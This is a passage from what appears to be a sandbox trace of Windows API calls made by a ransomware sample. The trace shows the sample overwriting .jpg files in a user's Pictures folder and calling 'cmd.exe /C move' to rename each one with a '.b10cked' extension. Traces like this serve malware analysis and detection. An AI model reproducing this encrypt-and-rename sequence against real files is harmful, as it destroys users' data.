hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.544] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.544] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.544] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3352 [0144.544] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x383a [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x383a [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.545] ReadFile (in: 
hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1c1c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1c1c, lpOverlapped=0x0) returned 1 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.545] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1c1c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1c1c, lpOverlapped=0x0) returned 1 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7196, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1c1e [0144.545] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1c1c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1c1c, lpOverlapped=0x0) returned 1 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7196, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1c1e [0144.545] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1c1c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1c1c, lpOverlapped=0x0) returned 1 [0144.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qgVefxhoS8T3s19q574.jpg", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qgVefxhoS8T3s19q574.jpg", cchWideChar=23, lpMultiByteStr=0x13288fc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qgVefxhoS8T3s19q574.jpg", lpUsedDefaultChar=0x0) returned 23 [0144.549] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x383a [0144.549] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0144.549] CloseHandle (hObject=0x114) returned 1 [0144.550] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\qgVefxhoS8T3s19q574.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG") returned 0x38 [0144.551] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\") returned 0x2c [0144.551] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x828, 
dwThreadId=0x7ec)) returned 1 [0144.552] CloseHandle (hObject=0x110) returned 1 [0144.552] CloseHandle (hObject=0x114) returned 1 [0144.552] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0144.552] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0144.552] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount1=58, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount2=58) returned 2 [0144.552] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.552] ReleaseMutex (hMutex=0xf8) returned 1 [0144.552] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.553] ReleaseMutex (hMutex=0xf8) returned 1 [0144.553] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.553] ReleaseMutex (hMutex=0xf8) returned 1 [0144.553] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.553] ReleaseMutex (hMutex=0xf8) returned 1 [0144.553] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\u8sH0rXco9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\u8sh0rxco9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0144.553] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.553] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.553] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.553] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20134352079) returned 1 [0144.554] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.554] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.554] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.554] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb782 [0144.556] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xbc6a [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xbc6a [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.557] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5e34, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5e34, lpOverlapped=0x0) returned 1 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.557] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5e34, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5e34, lpOverlapped=0x0) returned 1 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24116, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5e36 [0144.557] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5e34, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5e34, lpOverlapped=0x0) returned 1 [0144.558] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24116, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5e36 [0144.558] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5e34, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5e34, lpOverlapped=0x0) returned 1 [0144.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="u8sH0rXco9.jpg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="u8sH0rXco9.jpg", cchWideChar=14, lpMultiByteStr=0x131326c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u8sH0rXco9.jpg", lpUsedDefaultChar=0x0) returned 14 [0144.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xbc6a [0144.562] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0144.562] CloseHandle (hObject=0x114) returned 1 [0144.563] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\u8sH0rXco9.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG") returned 0x38 [0144.563] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\") returned 0x2c [0144.564] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x88c, dwThreadId=0x9cc)) returned 1 [0144.599] CloseHandle (hObject=0x110) returned 1 [0144.599] CloseHandle (hObject=0x114) returned 1 [0144.599] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0144.599] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX 